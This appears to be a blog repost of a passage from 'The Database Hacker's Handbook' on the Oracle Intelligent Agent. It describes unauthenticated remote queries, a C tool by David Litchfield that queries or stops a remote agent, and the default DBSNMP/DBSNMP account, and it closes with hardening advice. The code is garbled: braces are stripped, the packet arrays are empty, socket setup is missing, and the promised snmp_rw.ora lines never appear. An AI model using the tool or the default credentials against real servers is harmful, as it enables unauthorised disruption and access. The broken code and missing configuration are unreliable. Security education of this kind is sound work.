Senin, 19 Juli 2010

The Oracle Intelligent Agent

This component is peripheral to the actual RDBMS but is integral to its management. The Intelligent Agent performs a number of roles, but probably its most significant function is to gather management and performance data, which can be queried through SNMP or Oracle's own proprietary protocols. The Agent listens on TCP port 1748, 1808, and 1809. As far as SNMP is concerned the port is configurable and may be the default of UDP 161 or often dbsnmp can be found listening for SNMP requests on 1161. In Oracle 10g dbsnmp has gone and in its place is the emagent.

Performance data can be queried remotely without having to present a username or password using the Oracle Enterprise Manager tool—specifically using the "Performance Manager" of the "Diagnostic Pack." This, needless to say, can provide attackers with a wealth of information about the remote system. For example, they could list all running processes, get memory usage, and so on.

Another of the tools provided by Oracle to manage the Intelligent Agent is the agentctl utility. Using this tool the Agent can be stopped, started, queried for its status, and blackouts started and stopped. A blackout essentially tells the Agent to stop gathering data or stop executing jobs. The agentctl utility is somewhat limited though; it can't really be used to query remote systems. However, it does use sockets on the local system to communicate with the Agent so a couple of strategic break points in a debugging session will reveal what traffic is actually being passed backward and forward. If you prefer to use port redirection tools for this kind of work this will do admirably, also. Whichever way you dump the packets you'll quickly notice that none of the communications are authenticated. This means, for example, an attacker could define blackouts or stop the Agent without having to present any username or password. The following code can be used to dump information from the Intelligent Agent:

#define DBSNMPPORT 1748
int QueryDBSNMP(int in);
int StartWinsock(void);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";

unsigned char Packet_1[]=
unsigned char Packet_2[]=
unsigned char Packet_3[]=
unsigned char Packet_4[]=
int main(int argc, char *argv[])
int count = 56;
if(argc != 3)
printf("\n\n\n\tOracle DBSNMP Tool\n\n\t");
printf("C:\\>%s host status|stop",argv[0]);
printf("\n\n\tDavid Litchfield\n\t");
printf("\n\t4th June 2004\n\n\n\n");
return 0;
return printf("Error starting Winsock.\n");
Packet_3[69] = 0x38;
Packet_3[69] = 0x37;
return 0;

int StartWinsock()
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
return 0;
if (LOBYTE(wsaData.wVersion) !=2 || HIBYTE(wsaData.wVersion) !=0)
return 0;
if (isalpha(host[0]))
he = gethostbyname(host);
addr = inet_addr(host);
he = (struct hostent *)1;
if (he == NULL)
return 0;
return 1;

int QueryDBSNMP(int in)
unsigned char resp[1600]="";
int snd=0,rcv=0,count=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
if (cli_sock==INVALID_SOCKET)
printf("socket error.\n");
return 0;
cli_addr.sin_port=htons((unsigned short)0);
// setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
if (bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
printf("bind error");
return 0;
s_sa.sin_port=htons((unsigned short)DBSNMPPORT);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
printf("Connect error");
return 0;
snd=send(cli_sock, Packet_1 , 0x6A , 0);
rcv = recv(cli_sock,resp,1500,0);
if(rcv == SOCKET_ERROR)
printf("recv error.\n");
return 0;
snd=send(cli_sock, Packet_2 , 0x80 , 0);
rcv = recv(cli_sock,resp,1500,0);
if(rcv == SOCKET_ERROR)
printf("recv error.\n");
return 0;
snd=send(cli_sock, Packet_3 , 0x70 , 0);
rcv = recv(cli_sock,resp,1500,0);
if(rcv == SOCKET_ERROR)
printf("recv error.\n");
return 0;
if(in == 0x37)
return printf("Oracle Intelligent Agent has stopped");
snd=send(cli_sock, Packet_4 , 0x0A , 0);
rcv = recv(cli_sock,resp,1500,0);
if(rcv == SOCKET_ERROR)
printf("recv error.\n");
return 0;
return 0;
int PrintResponse(int size, unsigned char *ptr)
int count = 0;
int chk = 0;
int sp = 0;
printf("%.4X ",count);
while(count < size)
if(count % 16 == 0 && count > 0)
printf(" ");
chk = count;
count = count - 16;
while(count < chk)
count ++;
printf("\n%.4X ",count);
printf("%.2X ",ptr[count]);
count ++;
count = count - chk;
count = 17 - count;
while(sp < count)
printf(" ");
count = chk;
while(count < size)
count ++;
return 0;
The Intelligent Agent often needs to communicate with the database server and requires a user account and password for the RDBMS. By default this is DBSNMP/DBSNMP—one of the better known default Oracle accounts. When performing a security audit of an Oracle database server, I often find that all the default passwords have been changed except this one. The reason is that if you change the password on the database server, snmp traps don't work; you need to inform the Intelligent Agent of the password change, too. It seems that this is often too much hassle and is left in its default state. To properly change the password for the dbsnmp account you'll need to edit the snmp_rw.ora file as well. You can find this file on the ORACLE_HOME/network/admin directory. Add the following:

"SID" is the SID of the database server. You can get this from the snmp_ro.ora file in the same directory. Once done, change the password for DBSNMP in Oracle.

Note—never change a password using the ALTER USER command. The reason you shouldn't do this is because the SQL is logged if tracing is on, meaning that the password is also logged in clear text. Use the password command in SQL*Plus instead. In this case an encrypted version of the password is logged making it more secure against prying eyes.

chapter 2 (3)

The Database Hacker's Handbook: Defending Database Servers
by David Litchfield et al.
John Wiley & Sons © 2005

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